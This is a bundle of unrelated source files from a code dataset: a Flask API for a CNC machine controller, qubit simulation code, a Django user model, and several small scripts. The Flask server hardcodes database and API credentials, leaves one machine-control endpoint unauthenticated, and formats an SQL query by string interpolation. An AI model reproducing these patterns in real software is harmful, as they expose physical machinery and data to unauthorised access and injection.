Flask(__name__)\nCORS(app)\n\napp.config['MYSQL_HOST'] = 'localhost'\napp.config['MYSQL_USER'] = 'root'\napp.config['MYSQL_PASSWORD'] = 'machinekit'\napp.config['MYSQL_DB'] = 'machinekit'\napi_token = \"test_secret\"\n\nmysql = MySQL(app)\n\nUPLOAD_FOLDER = '/home/machinekit/devel/webUI/files'\nALLOWED_EXTENSIONS = set(['nc'])\n\nport = 12345\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.WARNING)\nfile_handler = logging.FileHandler('logfile.log')\nformatter = logging.Formatter(\n '%(asctime)s : %(levelname)s : %(name)s : %(message)s')\nfile_handler.setFormatter(formatter)\nlogger.addHandler(file_handler)\n\nfile_queue = []\n\ntry:\n controller = MachinekitController()\nexcept Exception as e:\n print(\"Machinekit is not running\")\n logger.critical(e)\n sys.exit(1)\n\n\ndef auth(f):\n \"\"\" Decorator that checks if the machine returned any errors.\"\"\"\n def wrapper(*args, **kwargs):\n headers = request.headers\n auth = headers.get(\"API_KEY\")\n if auth != api_token:\n return jsonify({\"errors\": \"Not authorized\"}), 400\n else:\n return f(*args, **kwargs)\n wrapper.__name__ = f.__name__\n return wrapper\n\n\n@app.route(\"/status\", methods=[\"GET\"])\n@auth\ndef get_axis():\n try:\n return jsonify(controller.get_all_vitals())\n except (Exception) as e:\n if str(e) == \"emcStatusBuffer invalid err=3\":\n logger.critical(e)\n return jsonify(\n {\"errors\": \"Machinekit is not running please restart machinekit and then the server\"}), 400\n logger.critical(e)\n return jsonify({\n \"errors\": str(e)\n }), 400\n\n\n@app.route(\"/position\", methods=[\"GET\"])\n@auth\ndef get_position():\n try:\n return jsonify(controller.axes_position())\n except (Exception) as e:\n if str(e) == \"emcStatusBuffer invalid err=3\":\n logger.critical(e)\n return jsonify(\n {\"errors\": \"Machinekit is not running please restart machinekit and then the server\"}), 400\n logger.critical(e)\n return jsonify({\n \"errors\": str(e)\n }), 400\n\n\n@app.route(\"/return_files\", methods=[\"GET\"])\n@auth\ndef return_files():\n try:\n cur = mysql.connection.cursor()\n cur.execute(\"\"\"\n SELECT * FROM files\n \"\"\")\n result = cur.fetchall()\n return jsonify({\"result\": result, \"file_queue\": file_queue})\n\n except Exception as e:\n return jsonify({\"errors\": str(e)}), 400\n\n\n@app.route(\"/set_machine_status\", methods=[\"POST\"])\n@auth\ndef set_status():\n try:\n data = request.json\n command = data['command']\n return jsonify(controller.machine_status(command))\n except (KeyError, Exception) as e:\n return jsonify({\n \"errors\": str(e)\n }), 400\n\n\n@app.route(\"/set_home\", methods=[\"POST\"])\n@auth\ndef set_home_axes():\n try:\n data = request.json\n command = data['command']\n if command == \"home\":\n return jsonify(controller.home_all_axes())\n else:\n return jsonify(controller.unhome_all_axes())\n except Exception as e:\n return jsonify({\n \"errors\": str(e)\n }), 400\n\n\n@app.route(\"/control_program\", methods=[\"POST\"])\ndef control_program():\n try:\n data = request.json\n command = data['command']\n return jsonify(controller.run_program(command))\n except Exception as e:\n return jsonify({\n \"errors\": str(e)\n }), 400\n\n\n@app.route(\"/send_command\", methods=[\"POST\"])\n@auth\ndef send_command():\n try:\n data = request.json\n command = data[\"mdi_command\"]\n return jsonify(controller.mdi_command(command))\n except (KeyError, Exception) as e:\n return jsonify({\n \"errors\": str(e)\n }), 400\n\n\n@app.route(\"/manual\", methods=[\"POST\"])\n@auth\ndef manual():\n try:\n data = request.json\n axes = data['axes']\n speed = data['speed']\n increment = data['increment']\n return jsonify(controller.manual_control(axes, speed, increment))\n except (KeyError, Exception) as e:\n return jsonify({\n \"errors\": str(e)\n }), 400\n\n\n@app.route(\"/spindle\", methods=[\"POST\"])\n@auth\ndef spindle():\n try:\n data = request.json\n command = data[\"command\"]\n if \"spindle_brake\" in command:\n return jsonify(controller.spindle_brake(command[\"spindle_brake\"]))\n elif \"spindle_direction\" in command:\n return jsonify(controller.spindle_direction(command[\"spindle_direction\"]))\n elif \"spindle_override\" in command:\n return jsonify(controller.spindleoverride(command[\"spindle_override\"]))\n else:\n return jsonify({\"error\": \"Unknown command\"})\n except(KeyError, Exception) as e:\n return jsonify({\n \"errors\": str(e)\n }), 400\n\n\n@app.route(\"/feed\", methods=[\"POST\"])\n@auth\ndef feed():\n try:\n data = request.json\n command = data[\"feedrate\"]\n return jsonify(controller.feedoverride(command))\n except(KeyError, Exception) as e:\n return jsonify({\n \"errors\": str(e)\n }), 400\n\n\n@app.route(\"/maxvel\", methods=[\"POST\"])\n@auth\ndef maxvel():\n try:\n data = request.json\n command = data[\"velocity\"]\n return jsonify(controller.maxvel(command))\n except(KeyError, Exception) as e:\n return jsonify({\n \"errors\": str(e)\n }), 400\n\n\n@app.route(\"/update_file_queue\", methods=[\"POST\"])\n@auth\ndef update_file_queue():\n try:\n global file_queue\n data = request.json\n new_queue = data[\"new_queue\"]\n file_queue = new_queue\n return jsonify({\"success\": \"Queue updated\"})\n except Exception as e:\n return jsonify({\"errors\": e}), 400\n\n\n@app.route(\"/tool_change\", methods=[\"GET\"])\n@auth\ndef tool_changer():\n try:\n # Dirty fix to bypass toolchange prompt\n os.system(\"halcmd setp hal_manualtoolchange.change_button true\")\n time.sleep(1)\n os.system(\"halcmd setp hal_manualtoolchange.change_button false\")\n return jsonify({\"success\": \"Command executed\"})\n except Exception as e:\n return jsonify({\"errors\": e}), 400\n\n\n@app.route(\"/open_file\", methods=[\"POST\"])\n@auth\ndef open_file():\n try:\n data = request.json\n path = data[\"path\"]\n return jsonify(controller.open_file(\"/home/machinekit/devel/webUI/files/\" + path))\n except Exception as e:\n return jsonify({\"errors\": e}), 400\n\n\n@app.route(\"/file_upload\", methods=[\"POST\"])\n@auth\ndef upload():\n try:\n if \"file\" not in request.files:\n return \"No file found\"\n\n file = request.files[\"file\"]\n filename = secure_filename(file.filename)\n cur = mysql.connection.cursor()\n cur.execute(\n \"\"\"\n SELECT * FROM files\n WHERE file_name = '%s' \"\"\" % filename)\n\n result = cur.fetchall()\n\n if len(result) > 0:\n return jsonify({\"errors\": \"File with given name already on server\"}), 400\n\n cur.execute(\"\"\"\n INSERT INTO files (file_name, file_location)\n VALUES (%s, %s)\n \"\"\", (filename, UPLOAD_FOLDER)\n )\n mysql.connection.commit()\n file.save(os.path.join(UPLOAD_FOLDER, filename))\n return jsonify(\"File added to database and saved to folder\")\n except Exception as e:\n return jsonify({\"errors\": e}), 400\n\n\nif __name__ == \"__main__\":\n app.run(debug=True, host='192.168.1.116', port=5000)\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":7952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"313825577","text":"import numpy as np\nimport scipy as sp\nimport scipy.optimize\nimport pycqed.simulations.transmon as tm\n\n\ndef kron(*args):\n \"\"\"Variable input number Kronecker product.\n See also numpy.kron\n \"\"\"\n assert len(args) > 0\n res = args[0]\n for x in args[1:]:\n res = np.kron(res, x)\n return res\n\n\ndef calculate_idle_spec_fidelity(fqb, anh, specs, t, angular_units=False):\n \"\"\"Calculates process fidelity of an idling qubit due to residual couplings\n\n Args:\n fqb: float\n qubit frequency\n anh: float\n qubit anharmonicity\n specs: list[tuple[fqb_spec, anh_spec, j, ef]]\n fqb_spec: float\n spectator qubit frequency\n anh_spec: float\n spectator qubit anharmonicity\n j: float\n coupling rate to the spectator qubit\n ef: bool\n if the spectator qubit can also be in the f-state\n t: float\n interaction time\n angular_units: bool\n True if the inputs are specified in angular frequency, False for\n regular frequency (default False)\n Returns:\n Worst case (over spectator qubit states) process fidelity.\n \"\"\"\n zeta = np.array([0])\n for fqb_spec, anh_spec, j, ef in specs:\n zeta_spec_e = tm.transition_dispersive_shift(1, fqb, anh, fqb_spec,\n anh_spec, j)\n if ef:\n zeta_spec_f = tm.transition_dispersive_shift(1, fqb, anh, fqb_spec,\n anh_spec, j, 2)\n zeta = kron(zeta, [1, 1, 1]) + kron(np.ones_like(zeta),\n [0, zeta_spec_e, zeta_spec_f])\n else:\n zeta = kron(zeta, [1, 1]) + kron(np.ones_like(zeta),\n [0, zeta_spec_e])\n z_angle = (1 if angular_units else 2 * np.pi) * zeta * t\n return tm.cz_process_fidelity(z_angle).min()\n\n\ndef calculate_gate_spec_fidelity(fint, anh1, anh2, specs1, specs2, t_gate,\n angular_units=False):\n \"\"\"Calculates process fidelity of a CZ gate due to residual couplings\n\n Args:\n fint: float\n lower gate qubit frequency during the gate\n anh1: float\n lower gate qubit anharmonicity\n anh2: float\n higher gate qubit anharmonicity\n specs1: list[tuple[fqb_spec, anh_spec, j, ef]]\n fqb_spec: float\n frequency of spectator qubit to lower gate qubit\n anh_spec: float\n anharmonicity of spectator qubit to lower gate qubit\n j: float\n coupling rate to the spectator qubit to the lower gate qubit\n ef: bool\n if the spectator qubit can also be in the f-state\n specs2: list[tuple[fqb_spec, anh_spec, j, ef]]\n fqb_spec: float\n frequency of spectator qubit to higher gate qubit\n anh_spec: float\n anharmonicity of spectator qubit to higher gate qubit\n j: float\n coupling rate to the spectator qubit to the higher gate qubit\n ef: bool\n if the spectator qubit can also be in the f-state\n t_gate: float\n interaction time\n angular_units: bool\n True if the inputs are specified in angular frequency, False for\n regular frequency (default False)\n Returns:\n Worst case (over spectator qubit states) process fidelity.\n \"\"\"\n fqb1 = fint\n fqb2 = fint - anh2\n zeta1_ge = np.array([0])\n zeta2_ge = np.array([0])\n zeta2_ef = np.array([0])\n\n for fqb_spec, anh_spec, j_spec, ef in specs1:\n zeta_ge_spec_e = tm.transition_dispersive_shift(1, fqb1, anh1, fqb_spec,\n anh_spec, j_spec, 1)\n if ef:\n zeta_ge_spec_f = tm.transition_dispersive_shift(1, fqb1, anh1,\n fqb_spec, anh_spec,\n j_spec, 2)\n zeta1_ge = kron(zeta1_ge, [1, 1, 1]) + kron(np.ones_like(zeta1_ge),\n [0, zeta_ge_spec_e,\n zeta_ge_spec_f])\n zeta2_ge = kron(zeta2_ge, [1, 1, 1])\n zeta2_ef = kron(zeta2_ef, [1, 1, 1])\n else:\n zeta1_ge = kron(zeta1_ge, [1, 1]) + kron(np.ones_like(zeta1_ge),\n [0, zeta_ge_spec_e])\n zeta2_ge = kron(zeta2_ge, [1, 1])\n zeta2_ef = kron(zeta2_ef, [1, 1])\n\n for fqb_spec, anh_spec, j_spec, ef in specs2:\n zeta_ge_spec_e = tm.transition_dispersive_shift(1, fqb2, anh2, fqb_spec,\n anh_spec, j_spec, 1)\n zeta_ef_spec_e = tm.transition_dispersive_shift(2, fqb2, anh2, fqb_spec,\n anh_spec, j_spec, 1)\n if ef:\n zeta_ge_spec_f = tm.transition_dispersive_shift(1, fqb2, anh2,\n fqb_spec, anh_spec,\n j_spec, 2)\n zeta_ef_spec_f = tm.transition_dispersive_shift(2, fqb2, anh2,\n fqb_spec, anh_spec,\n j_spec, 2)\n zeta1_ge = kron(zeta1_ge, [1, 1, 1])\n zeta2_ge = kron(zeta2_ge, [1, 1, 1]) + kron(np.ones_like(zeta2_ge),\n [0, zeta_ge_spec_e,\n zeta_ge_spec_f])\n zeta2_ef = kron(zeta2_ef, [1, 1, 1]) + kron(np.ones_like(zeta2_ef),\n [0, zeta_ef_spec_e,\n zeta_ef_spec_f])\n else:\n zeta1_ge = kron(zeta1_ge, [1, 1])\n zeta2_ge = kron(zeta2_ge, [1, 1]) + kron(np.ones_like(zeta2_ge),\n [0, zeta_ge_spec_e])\n zeta2_ef = kron(zeta2_ef, [1, 1]) + kron(np.ones_like(zeta2_ef),\n [0, zeta_ef_spec_e])\n\n z1 = (1 if angular_units else 2 * np.pi) * zeta1_ge * t_gate\n z2 = (1 if angular_units else 2 * np.pi) * zeta2_ge * t_gate\n zc = (0.5 if angular_units else np.pi) * (zeta2_ef - zeta1_ge) * t_gate\n\n return tm.cz_process_fidelity(z1, z2, zc).min()\n\n\ndef calculate_step_fidelity(qubits, couplings, wints):\n \"\"\"Calculates the process fidelity for a step of parallel gates\n\n Args:\n qubits: dict[str, dict[str, any]]\n A dictionary from qubit names to properties. The following\n properties should be defined:\n neighbors: a set of qubit names that neighbor this qubit\n wq: qubit parking frequency\n anh: qubit anharmonicity (negative for transmon qubits)\n couplings: dict[frozenset[str], float]\n Qubit-qubit coupling rates. Keys are frozensets of coupled qubit\n names and values are the 01-10 coupling rates.\n wints: dict[frozenset[str], float]\n Interaction frequencies of gates that will be executed in parallel\n Return: dict[str, float]\n Worst-case process fidelity of each qubit in the parallel gate step.\n For qubits involved in gates, the total error is equally divided\n between the two qubits.\n \"\"\"\n active_qubits = {qn for g in wints for qn in g}\n inactive_qubits = {qn for qn in qubits if qn not in active_qubits}\n qubit_freqs = {qn: qubits[qn]['wq'] for qn in inactive_qubits}\n qubit_ef = {qn: False for qn in inactive_qubits}\n step_time = 0\n fidelities = {}\n for g in wints:\n step_time = max(step_time, 1 / (np.sqrt(8) * couplings[g]))\n for qn, k_anh, ef in zip(sorted(g, key=lambda qn: qubits[qn]['wq']),\n [0, 1], [False, True]):\n qubit_freqs[qn] = wints[g] - k_anh * qubits[qn]['anh']\n qubit_ef[qn] = ef\n for qn in inactive_qubits:\n specs = [\n (qubit_freqs[qn2], qubits[qn2]['anh'],\n couplings[frozenset({qn, qn2})], qubit_ef[qn2])\n for qn2 in qubits[qn]['neighbors']\n ]\n fidelities[qn] = \\\n calculate_idle_spec_fidelity(qubit_freqs[qn], qubits[qn]['anh'],\n specs, step_time)\n\n for g in wints:\n qn1, qn2 = sorted(g, key=lambda qn: qubits[qn]['wq'])\n specs1, specs2 = [\n [\n (qubit_freqs[qn3], qubits[qn3]['anh'],\n couplings[frozenset({qn, qn3})], qubit_ef[qn3])\n for qn3 in qubits[qn]['neighbors'] if qn3 not in g\n ] for qn in [qn1, qn2]\n ]\n fid = calculate_gate_spec_fidelity(wints[g], qubits[qn1]['anh'],\n qubits[qn2]['anh'],\n specs1, specs2, step_time)\n fidelities[qn1] = np.sqrt(fid)\n fidelities[qn2] = np.sqrt(fid)\n return fidelities\n\n\nclass InvalidParallelGatesError(Exception):\n \"\"\"Parallel gate interaction frequency finding problem has no solution\"\"\"\n pass\n\n\ndef find_interaction_frequencies(qubits, couplings, gates, method='optimize'):\n \"\"\"\n Find optimal interaction frequencies\n\n Args:\n qubits: dict[str, dict[str, any]]\n A dictionary from qubit names to properties. The following\n properties should be defined:\n neighbors: a set of qubit names that neighbor this qubit\n wq: qubit parking frequency\n anh: qubit anharmonicity (negative for transmon qubits)\n couplings: dict[frozenset[str], float]\n Qubit-qubit coupling rates. Keys are frozensets of coupled qubit\n names and values are the 01-10 coupling rates.\n gates: collection[frozenset[str]]\n A collection of gates (frozenset of involved qubit names) that will\n be executed in parallel.\n method: str\n Method for choosing the interaction frequencies. Valid options:\n 'equal_spacing': maximizes the minimal detuning from all\n spurious resonant interactions\n 'optimize': minimizes total residual interaction error\n Returns: dict[frozenset[str], float]\n For each gate (key), the optimal interaction frequency\n \"\"\"\n # connected subsets of qubits\n not_assigned_to_group = {qn for g in gates for qn in g}\n connected_groups = set()\n while len(not_assigned_to_group) != 0:\n # find a set of connected qubits (group)\n to_visit = {(next(iter(not_assigned_to_group)), None)}\n group = [] # all active qubits involved in the step and their neighbors\n while len(to_visit) != 0:\n qni, qn_from = to_visit.pop()\n group.append((qni, qn_from))\n for qnj in qubits[qni]['neighbors']:\n if qnj in not_assigned_to_group and qnj != qn_from:\n if qnj in group:\n raise InvalidParallelGatesError(f'Cycle: {group}')\n to_visit.add((qnj, qni))\n not_assigned_to_group -= {g[0] for g in group}\n connected_groups.add(tuple(group))\n\n # neighboring gate graphs\n gate_graphs = []\n inv_gate_graphs = []\n for group in connected_groups:\n unordered_gates = {tuple(sorted(g, key=lambda qn: qubits[qn]['wq'])) for\n g in group if frozenset(g) in gates}\n unordered_connections = {frozenset(g) for g in group if\n frozenset(g) not in gates and None not in g}\n gate_graph = {} # from low int. freq gates to high int. freq gates\n inv_gate_graph = {} # from high int. freq gates to low int. freq gates\n for g in unordered_gates:\n gate_graph[g] = set()\n inv_gate_graph[g] = set()\n for c in unordered_connections:\n if g[0] in c:\n qn = [qn for qn in c if qn != g[0]][0]\n for g2 in unordered_gates:\n if g2[0] == qn:\n raise InvalidParallelGatesError(\n f'Opposing gate directions: {g}, {g2}')\n if g2[1] == qn:\n gate_graph[g].add(g2)\n if g[1] in c:\n qn = [qn for qn in c if qn != g[1]][0]\n for g2 in unordered_gates:\n if g2[1] == qn:\n raise InvalidParallelGatesError(\n f'Opposing gate directions: {g}, {g2}')\n if g2[0] == qn:\n inv_gate_graph[g].add(g2)\n gate_graphs.append(gate_graph)\n inv_gate_graphs.append(inv_gate_graph)\n\n # optimize each gate graph\n gate_wints = {}\n if method == 'equal_spacing':\n # interactions to avoid:\n # for high-freq int. qubits: 2x anh below (1x anh above)\n # for low-freq int. qubits: 1x anh above (1x anh below)\n\n # strategy: start traversing gate graph from low to high, placing each\n # interaction frequency as low as possible and remember, how much\n # higher it could be placed, and in which layer this gate is\n # finally distribute the minimal slack equally\n for gate_graph, inv_gate_graph in zip(gate_graphs, inv_gate_graphs):\n layer = 0\n gate_layers_wints = {}\n next_gates = {g for g, conns in inv_gate_graph.items() if\n len(conns) == 0}\n while len(next_gates) != 0:\n new_next_gates = set()\n for g in next_gates:\n wintmin = qubits[g[0]]['wq']\n wintmax = qubits[g[1]]['wq'] + qubits[g[1]]['anh']\n # low qubit interactions with parked spectator qubits\n for qn in qubits[g[0]]['neighbors']:\n if qn != g[1]:\n wintmax = min(wintmax,\n qubits[qn]['wq'] + qubits[qn]['anh'])\n # high qubit interactions with parked spectator qubits\n for qn in qubits[g[1]]['neighbors']:\n if qn != g[0]:\n wintmin = max(wintmin,\n qubits[qn]['wq'] + qubits[g[1]][\n 'anh'])\n # interactions with neighboring gates\n for g2 in inv_gate_graph[g]:\n wintmin = max(wintmin,\n gate_layers_wints[g2][1] - qubits[g[1]][\n 'anh'])\n gate_layers_wints[g] = (layer, wintmin, wintmax)\n new_next_gates |= gate_graph[g]\n next_gates = new_next_gates\n layer += 1\n slack = min([(wintmax - wintmin) / (layer + 2) for\n g, (layer, wintmin, wintmax) in\n gate_layers_wints.items()])\n for g, (layer, wintmin, wintmax) in gate_layers_wints.items():\n gate_wints[frozenset(g)] = wintmin + (layer + 1) * slack\n elif method == 'optimize':\n gate_wints = find_interaction_frequencies(qubits, couplings, gates,\n method='equal_spacing')\n x0 = [gate_wints[g] for g in gates]\n\n def cost_func(x):\n fid = calculate_step_fidelity(qubits, couplings,\n dict(zip(gates, x)))\n return -np.sum(np.log([f for f in fid.values()]))\n\n x1 = sp.optimize.minimize(cost_func, x0).x\n x2 = sp.optimize.minimize(cost_func, x1).x\n gate_wints = dict(zip(gates, x2))\n else:\n raise ValueError(\n f\"Invalid method: {method}. Valid options are: \"\n \"['equal_spacing', 'optimize']\")\n return gate_wints\n","sub_path":"pycqed/simulations/interaction_frequencies.py","file_name":"interaction_frequencies.py","file_ext":"py","file_size_in_byte":16358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"168910752","text":"from threading import Thread\n\nfrom flask_mail import Message\n\nfrom app import app, mail\n\n\ndef send_async_email(msg):\n with app.app_context():\n mail.send(msg)\n\n\ndef send_email(subject, text_body):\n msg = Message(subject, recipients=['vpozhinskii@mail.ru'])\n msg.body = text_body\n thread = Thread(target=send_async_email, args=[msg])\n thread.start()","sub_path":"backend/app/mail.py","file_name":"mail.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"49077887","text":"from django.contrib.auth.base_user import AbstractBaseUser\nfrom django.contrib.auth.models import PermissionsMixin, BaseUserManager\nfrom django.contrib.auth.validators import UnicodeUsernameValidator, ASCIIUsernameValidator\nfrom django.core.mail import send_mail\nfrom django.db import models\nfrom django.db import transaction\nfrom django.utils import six\nfrom django.utils import timezone\nfrom django.utils.translation import ugettext_lazy as _\nfrom phonenumber_field.modelfields import PhoneNumberField\nfrom taggit.managers import TaggableManager\n\nfrom account.constants import PHONE, USERNAME, EMAIL, GENDER, FIRST_NAME, LAST_NAME\nfrom account.signals import user_created\nfrom common.constants import OID\nfrom common.models import ObjectIdMixin\nfrom common.models import TagsMixin\nfrom helper.log import get_logger\n\nlogger = get_logger(__name__)\n\n\nclass UserManager(BaseUserManager):\n use_in_migrations = True\n\n @classmethod\n def normalize_phone(cls, phone):\n return phone.strip()\n\n @classmethod\n def normalize_email(cls, email):\n \"\"\"\n Normalize the email address by lowercasing the domain part of it.\n \"\"\"\n return super(UserManager, cls).normalize_email(email) or None\n\n def _create_user(self, password, phone=None, email=None, username=None, **extra_fields):\n \"\"\"\n Creates and saves a User with the given username, email and password.\n \"\"\"\n if not phone and not email:\n raise ValueError('The given phone or email must be set')\n create_data = {}\n if email:\n email = self.normalize_email(email)\n create_data[EMAIL] = email\n if phone:\n phone = self.normalize_phone(phone)\n create_data[PHONE] = phone\n if not username:\n username = phone or email\n username = self.model.normalize_username(username)\n create_data[USERNAME] = username\n oid = self.model.object_id_manager.generate_oid()\n create_data[OID] = oid\n extra_fields.update(create_data)\n with transaction.atomic():\n user = self.model(**extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n user_created.send(sender=User, user=user)\n return user\n\n def create_user(self, password, phone=None, email=None, **extra_fields):\n extra_fields.setdefault('is_staff', False)\n extra_fields.setdefault('is_superuser', False)\n return self._create_user(password, phone=phone, email=email, **extra_fields)\n\n def create_superuser(self, username, password, phone=None, email=None, **extra_fields):\n extra_fields.setdefault('is_staff', True)\n extra_fields.setdefault('is_superuser', True)\n\n if extra_fields.get('is_staff') is not True:\n raise ValueError('Superuser must have is_staff=True.')\n if extra_fields.get('is_superuser') is not True:\n raise ValueError('Superuser must have is_superuser=True.')\n\n return self._create_user(password, phone=phone, email=email, username=username, **extra_fields)\n\n\nclass User(AbstractBaseUser, ObjectIdMixin, PermissionsMixin, TagsMixin):\n\n UNKNOWN = 0\n MALE = 1\n FEMALE = 2\n\n GENDER_CHOICE = (\n (UNKNOWN, '未知'),\n (MALE, '男性'),\n (FEMALE, '女性'),\n )\n\n username_validator = UnicodeUsernameValidator() if six.PY3 else ASCIIUsernameValidator()\n\n username = models.CharField(\n _(USERNAME),\n max_length=150,\n unique=True,\n null=True,\n help_text=_('Required. 150 characters or fewer. Letters, digits and @/./+/-/_ only.'),\n validators=[username_validator],\n error_messages={\n 'unique': _(\"A user with that username already exists.\"),\n },\n )\n\n email = models.EmailField(\n _('email address'),\n blank=True,\n unique=True,\n null=True,\n default=None,\n error_messages={\n 'unique': _(\"A user with that email already exists.\"),\n },\n )\n\n phone = PhoneNumberField(\n _('telephone number'),\n blank=True,\n unique=True,\n null=True,\n error_messages={\n 'unique': _(\"A user with that telephone already exists.\"),\n },\n )\n\n first_name = models.CharField(_(FIRST_NAME), max_length=30, blank=True)\n last_name = models.CharField(_(LAST_NAME), max_length=30, blank=True)\n\n gender = models.PositiveSmallIntegerField(_(GENDER), choices=GENDER_CHOICE, default=UNKNOWN)\n\n is_staff = models.BooleanField(\n _('staff status'),\n default=False,\n help_text=_('Designates whether the user can log into this admin site.'),\n )\n is_active = models.BooleanField(\n _('active'),\n default=True,\n help_text=_(\n 'Designates whether this user should be treated as active. '\n 'Unselect this instead of deleting accounts.'\n ),\n )\n date_joined = models.DateTimeField(_('date joined'), default=timezone.now)\n\n objects = UserManager()\n\n USERNAME_FIELD = USERNAME\n REQUIRED_FIELDS = [EMAIL]\n\n class Meta:\n verbose_name = _('user')\n verbose_name_plural = _('users')\n swappable = 'AUTH_USER_MODEL'\n\n def get_full_name(self):\n \"\"\"\n Returns the first_name plus the last_name, with a space in between.\n \"\"\"\n full_name = '%s %s' % (self.first_name, self.last_name)\n return full_name.strip()\n\n def get_short_name(self):\n \"\"\"Returns the short name for the user.\"\"\"\n return self.first_name\n\n def email_user(self, subject, message, from_email=None, **kwargs):\n \"\"\"\n Sends an email to this User.\n \"\"\"\n send_mail(subject, message, from_email, [self.email], **kwargs)\n\n @property\n def full_name(self):\n return self.get_full_name()\n\n @property\n def short_name(self):\n return self.get_short_name()\n\n @property\n def salutation(self):\n if self.gender == self.MALE:\n return '先生'\n elif self.gender == self.FEMALE:\n return '女士 '\n return '客人'\n","sub_path":"src/apps/account/models/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":6154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"391903987","text":"\"\"\"\nThis file will verify the cosmic time - redshift equation shown in https://arxiv.org/pdf/gr-qc/0506079.pdf \nby comparing it to the original equation in our in model\n\"\"\"\nimport math\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef cosmoEq(t):\n W_M=0.308 #matter energy density parameter\n W_lambda=0.692 #dark energy density parameter\n H_0=0.0692 #Gyr⁻¹ - Hubble's constant\n return (((math.sinh(3*W_lambda**0.5*t / (2*1/H_0) ) * (W_lambda/W_M)**-0.5)**(-2/3)) -1)\n\ndef approx(t):\n return (((28./(t))-1.)**(1./2.)-1.)\n\nts = np.linspace(0.051,14,1000000) # time in Gyr\nx = [cosmoEq(i) for i in ts]\ny = [approx(i) for i in ts]\n\nplt.plot(ts,x, color='red', label='Cosmology Equation')\nplt.plot(ts,y, color='blue', label='Approximation')\nplt.xlabel('Cosmic Time [Gyrs]')\nplt.ylabel('Redshift')\nplt.legend()\nplt.show()","sub_path":"Our Scripts/old stuff/redshiftEqns.py","file_name":"redshiftEqns.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"268333823","text":"import pygame\r\n\r\n# Ship class\r\nclass Ship:\r\n\r\n def __init__(self, pos, vel, angle, image, info):\r\n self.pos = [pos[0], pos[1]]\r\n self.vel = [vel[0], vel[1]]\r\n self.thrust = False\r\n self.angle = angle\r\n self.angle_vel = 0\r\n self.image = image\r\n self.image_center = info.get_center()\r\n self.image_size = info.get_size()\r\n self.radius = info.get_radius()\r\n \r\n def draw(self,screen):\r\n if self.thrust:\r\n # isolate the single ship thrust image and create a new surface from it\r\n rot_image = self.image.subsurface((90, 0), (90, 90))\r\n else:\r\n # isolate the single ship image and create a new surface from it\r\n rot_image = self.image.subsurface((0, 0), (90, 90))\r\n\r\n rot_image = pygame.transform.scale(rot_image, self.image_size)\r\n \r\n orig_rect = rot_image.get_rect()\r\n \r\n # convert angle to radians\r\n rot_image = pygame.transform.rotate(rot_image, - (180 * self.angle / math.pi))\r\n\r\n # center the rectangle on the newly rotated image\r\n rot_rect = orig_rect.copy()\r\n rot_rect.center = rot_image.get_rect().center\r\n rot_image = rot_image.subsurface(rot_rect).copy()\r\n\r\n # adjust draw position due to drawing from top left corner and not center\r\n screen.blit(rot_image, [self.pos[0] - self.image_center[0], self.pos[1] - self.image_center[1]], rot_image.get_rect())\r\n\r\n def update(self):\r\n # update angle\r\n self.angle += self.angle_vel\r\n \r\n # update position\r\n self.pos[0] = (self.pos[0] + self.vel[0]) % WIDTH\r\n self.pos[1] = (self.pos[1] + self.vel[1]) % HEIGHT\r\n\r\n # update velocity\r\n if self.thrust:\r\n acc = angle_to_vector(self.angle)\r\n self.vel[0] += acc[0] * .1\r\n self.vel[1] += acc[1] * .1\r\n \r\n self.vel[0] *= .99\r\n self.vel[1] *= .99\r\n\r\n def set_thrust(self, on):\r\n self.thrust = on\r\n if on:\r\n ship_thrust_sound.stop()\r\n ship_thrust_sound.play()\r\n else:\r\n ship_thrust_sound.stop()\r\n \r\n def increment_angle_vel(self):\r\n self.angle_vel += .05\r\n \r\n def decrement_angle_vel(self):\r\n self.angle_vel -= .05\r\n \r\n def shoot(self):\r\n global missile_group\r\n forward = angle_to_vector(self.angle)\r\n missile_pos = [self.pos[0] + self.radius * forward[0], self.pos[1] + self.radius * forward[1]]\r\n missile_vel = [self.vel[0] + 6 * forward[0], self.vel[1] + 6 * forward[1]]\r\n a_missile = Sprite(missile_pos, missile_vel, self.angle, 0, missile_image, missile_info, missile_sound)\r\n missile_group.add(a_missile)\r\n \r\n def get_pos(self):\r\n return self.pos\r\n \r\n def get_radius(self):\r\n return self.radius","sub_path":"ship.py","file_name":"ship.py","file_ext":"py","file_size_in_byte":2889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"80946757","text":"from __future__ import print_function\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn.metrics import classification_report\r\nfrom sklearn import datasets\r\nimport numpy as np\r\nimport cv2\r\nimport sklearn\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn import datasets, svm, metrics\r\nimport struct\r\nimport sys\r\n\r\n\r\n\r\n\r\ndef main():\r\n\r\n fast = False\r\n if(len(sys.argv) > 1 and sys.argv[1]=='fast'):\r\n print (\"running fast version\")\r\n fast = True\r\n\r\n print(\"IRIS DATA\")\r\n testData, testLabels, trainData, trainLabels, valData, valLabels = ExtructIris(fast)\r\n PerformKnn(testData, testLabels, trainData, trainLabels, valData, valLabels)\r\n PerformSvm(testData, testLabels, trainData, trainLabels, valData, valLabels)\r\n print(\"\\n\\n MNIST DATA\")\r\n testData, testLabels, trainData, trainLabels, valData, valLabels = ExtructMNIST(fast)\r\n PerformKnn(testData, testLabels, trainData, trainLabels, valData, valLabels)\r\n PerformSvm(testData, testLabels, trainData, trainLabels, valData, valLabels)\r\n\r\ndef ExtructIris(fast):\r\n iris = datasets.load_iris()\r\n trainData, trainLabels = iris.data ,iris.target\r\n (trainData, valData, trainLabels, valLabels) = train_test_split(trainData, trainLabels, test_size=0.1)\r\n (trainData, 